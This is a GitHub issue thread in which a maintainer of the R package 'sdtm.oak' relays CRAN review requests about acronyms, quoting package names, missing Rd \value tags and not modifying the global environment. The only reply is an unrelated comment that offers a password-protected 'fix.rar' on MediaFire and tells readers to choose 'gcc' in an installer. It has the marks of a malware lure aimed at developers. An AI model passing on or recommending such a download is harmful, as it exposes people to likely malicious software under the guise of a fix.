### ISSUE TITLE
CRAN Comments

### ISSUE THREAD

**Issue by rammprasad** [pharmaverse/sdtm.oak#90]
### Background Information

Please always explain all acronyms in the description text. -> EDC,
SDTM, etc...

Please always write package names, software names and API (application
programming interface) names in single quotes in title and description.
e.g: --> 'sdtm.oak'
Please note that package names are case sensitive.

Please add \value to .Rd files regarding exported methods and explain
the functions results in the documentation. Please write about the
structure of the output (class) and also what the output means. (If a
function does not return a value, please document that too, e.g.
\value{No return value, called for side effects} or similar)
Missing Rd-tags:
      create_iso8601.Rd: \value
      ct_spec_vars.Rd: \value
      ctl_new_rowid_pillar.cnd_df.Rd: \value
      dot_pipe.Rd: \value
      mutate.cnd_df.Rd: \value
      sbj_vars.Rd: \arguments
      tbl_sum.cnd_df.Rd: \value

Please do not modify the global environment (e.g. by using <<-) in your
functions. This is not allowed by the CRAN policies.
-> R/zzz.R

Please fix and resubmit.

Best,
Benjamin Altmann

### Definition of Done

Fix CRAN comments and re-release.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
